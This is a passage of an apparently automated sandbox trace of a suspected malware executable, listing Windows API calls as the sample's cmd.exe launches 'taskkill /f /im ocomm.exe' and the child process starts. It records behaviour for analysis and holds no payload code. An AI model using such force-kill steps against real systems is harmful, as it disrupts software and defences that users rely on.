RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x76a810, Size=0x78) returned 0x76a810 [0184.047] GetProcessHeap () returned 0x760000 [0184.047] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x76a810) returned 0x78 [0184.047] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0184.047] GetProcessHeap () returned 0x760000 [0184.047] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x62) returned 0x76a890 [0184.047] GetProcessHeap () returned 0x760000 [0184.047] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb8) returned 0x76a900 [0184.047] GetProcessHeap () returned 0x760000 [0184.047] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x76a900, Size=0x62) returned 0x76a900 [0184.047] GetProcessHeap () returned 0x760000 [0184.047] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x76a900) returned 0x62 [0184.047] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0184.047] GetProcessHeap () returned 0x760000 [0184.047] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe0) returned 0x76a970 [0184.052] GetProcessHeap () returned 0x760000 [0184.052] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x76a970, Size=0x76) returned 0x76a970 [0184.053] GetProcessHeap () returned 0x760000 [0184.053] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x76a970) returned 0x76 [0184.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.053] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im ocomm.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0184.053] GetLastError () returned 0x3 [0184.053] GetProcessHeap () returned 0x760000 [0184.054] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76fc58) returned 1 [0184.054] GetProcessHeap () returned 0x760000 [0184.054] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x773c68) returned 1 [0184.054] GetProcessHeap () returned 0x760000 [0184.055] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76bc40) returned 1 [0184.055] GetConsoleOutputCP () returned 0x1b5 [0184.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0184.056] GetUserDefaultLCID () returned 0x409 [0184.056] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0184.056] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0184.056] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0184.056] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0184.056] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0184.056] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0184.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0184.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0184.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0184.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0184.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0184.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0184.057] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0184.057] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0184.057] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0184.058] GetProcessHeap () returned 0x760000 [0184.058] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20c) returned 0x76aa38 [0184.059] GetConsoleTitleW (in: lpConsoleTitle=0x76aa38, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0184.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0184.061] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0184.061] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0184.061] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0184.061] GetProcessHeap () returned 0x760000 [0184.061] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x400a) returned 0x76bc40 [0184.061] GetProcessHeap () returned 0x760000 [0184.062] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76bc40) returned 1 [0184.063] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0184.063] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0184.063] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0184.063] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0184.063] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0184.063] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0184.063] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0184.063] GetProcessHeap () returned 0x760000 [0184.063] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x58) returned 0x76ac50 [0184.063] GetProcessHeap () returned 0x760000 [0184.063] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1a) returned 0x760578 [0184.063] GetProcessHeap () returned 0x760000 [0184.063] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2e) returned 0x76acb0 [0184.064] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0184.066] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0184.067] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0184.067] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0184.067] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0184.067] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0184.067] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0184.067] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0184.067] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0184.067] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0184.067] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0184.067] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0184.067] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0184.067] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0184.067] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0184.067] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0184.067] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0184.067] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0184.067] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0184.067] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0184.067] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0184.067] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0184.067] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0184.067] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0184.067] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0184.067] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0184.067] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0184.067] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0184.067] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0184.068] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0184.068] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0184.068] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0184.068] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0184.068] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0184.068] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0184.068] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0184.068] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0184.068] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0184.068] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0184.068] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0184.068] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0184.068] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0184.068] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0184.068] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0184.068] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0184.068] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0184.068] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0184.068] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0184.068] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0184.068] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0184.068] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0184.068] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0184.068] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0184.068] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0184.068] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0184.068] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0184.068] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0184.068] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0184.069] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0184.069] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0184.069] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0184.069] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0184.069] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0184.069] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0184.069] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0184.069] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0184.069] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0184.069] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0184.069] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0184.069] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0184.069] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0184.069] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0184.069] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0184.069] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0184.069] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0184.069] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0184.069] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0184.069] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0184.069] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0184.069] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0184.069] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0184.069] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0184.069] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0184.069] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0184.069] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0184.069] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0184.069] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0184.069] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0184.070] GetProcessHeap () returned 0x760000 [0184.070] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x210) returned 0x76ace8 [0184.070] GetProcessHeap () returned 0x760000 [0184.070] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x40) returned 0x76af00 [0184.070] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0184.070] GetProcessHeap () returned 0x760000 [0184.070] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x418) returned 0x7605c8 [0184.070] SetErrorMode (uMode=0x0) returned 0x8003 [0184.070] SetErrorMode (uMode=0x1) returned 0x0 [0184.071] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7605d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0184.071] SetErrorMode (uMode=0x8003) returned 0x1 [0184.071] GetProcessHeap () returned 0x760000 [0184.071] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x7605c8, Size=0x56) returned 0x7605c8 [0184.071] GetProcessHeap () returned 0x760000 [0184.071] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x7605c8) returned 0x56 [0184.071] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0184.071] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.071] GetProcessHeap () returned 0x760000 [0184.071] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x110) returned 0x76af48 [0184.071] GetProcessHeap () returned 0x760000 [0184.071] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x218) returned 0x760628 [0184.100] GetProcessHeap () returned 0x760000 [0184.100] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x760628, Size=0x112) returned 0x760628 [0184.100] GetProcessHeap () returned 0x760000 [0184.100] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x760628) returned 0x112 [0184.100] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0184.100] GetProcessHeap () returned 0x760000 [0184.100] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xe0) returned 0x76b060 [0184.102] GetProcessHeap () returned 0x760000 [0184.102] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x76b060, Size=0x76) returned 0x76b060 [0184.102] GetProcessHeap () returned 0x760000 [0184.102] RtlSizeHeap (HeapHandle=0x760000, Flags=0x0, MemoryPointer=0x76b060) returned 0x76 [0184.102] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.102] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0184.102] GetLastError () returned 0x2 [0184.102] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x76b0e0 [0184.103] GetProcessHeap () returned 0x760000 [0184.103] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x767438 [0184.103] FindClose (in: hFindFile=0x76b0e0 | out: hFindFile=0x76b0e0) returned 1 [0184.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0184.103] GetLastError () returned 0x2 [0184.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x76b0e0 [0184.103] GetProcessHeap () returned 0x760000 [0184.103] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x767438, Size=0x4) returned 0x76b120 [0184.103] FindClose (in: hFindFile=0x76b0e0 | out: hFindFile=0x76b0e0) returned 1 [0184.104] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.104] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.104] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0184.105] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0184.105] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0184.105] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130)) [0184.105] GetProcessHeap () returned 0x760000 [0184.105] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x767738 [0184.105] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0184.105] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0184.105] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0184.106] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0184.107] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0184.107] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0184.107] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0184.107] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0184.107] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0184.107] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0184.107] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0184.107] GetProcessHeap () returned 0x760000 [0184.107] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x767738) returned 1 [0184.107] GetProcessHeap () returned 0x760000 [0184.107] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa) returned 0x76b0e0 [0184.107] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0184.110] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im ocomm.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im ocomm.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im ocomm.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x13e0, dwThreadId=0x1260)) returned 1 [0184.129] CloseHandle (hObject=0x98) returned 1 [0184.129] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0184.129] GetProcessHeap () returned 0x760000 [0184.130] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x769d40) returned 1 [0184.130] GetEnvironmentStringsW () returned 0x769d40* [0184.130] GetProcessHeap () returned 0x760000 [0184.130] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa76) returned 0x76bc40 [0184.130] FreeEnvironmentStringsA (penv="=") returned 1 [0184.131] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0185.270] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0185.270] CloseHandle (hObject=0x9c) returned 1 [0185.271] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0185.271] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0185.271] GetProcessHeap () returned 0x760000 [0185.272] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76bc40) returned 1 [0185.272] GetEnvironmentStringsW () returned 0x76b130* [0185.272] GetProcessHeap () returned 0x760000 [0185.272] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa9c) returned 0x76bbd8 [0185.272] FreeEnvironmentStringsA (penv="=") returned 1 [0185.272] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.272] GetProcessHeap () returned 0x760000 [0185.272] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76bbd8) returned 1 [0185.272] GetEnvironmentStringsW () returned 0x76b130* [0185.272] GetProcessHeap () returned 0x760000 [0185.272] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa9c) returned 0x76bbd8 [0185.273] FreeEnvironmentStringsA (penv="=") returned 1 [0185.273] GetProcessHeap () returned 0x760000 [0185.273] RtlFreeHeap (HeapHandle=0x760000, Flags=0x0, BaseAddress=0x76b0e0) returned 1 [0185.273] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0185.273] _get_osfhandle (_FileHandle=1) returned 0x158 [0185.273] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0185.273] _get_osfhandle (_FileHandle=1) returned 0x158 [0185.273] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0185.273] _get_osfhandle (_FileHandle=0) returned 0x154 [0185.273] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0185.273] GetConsoleOutputCP () returned 0x1b5 [0185.278] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0185.278] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.280] exit (_Code=128) Thread: id = 250 os_tid = 0x1264 Process: id = "45" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x57d7f000" os_pid = "0x13e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x13f4" cmd_line = "taskkill /f /im ocomm.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3410 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3411 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3412 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3413 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 3414 start_va 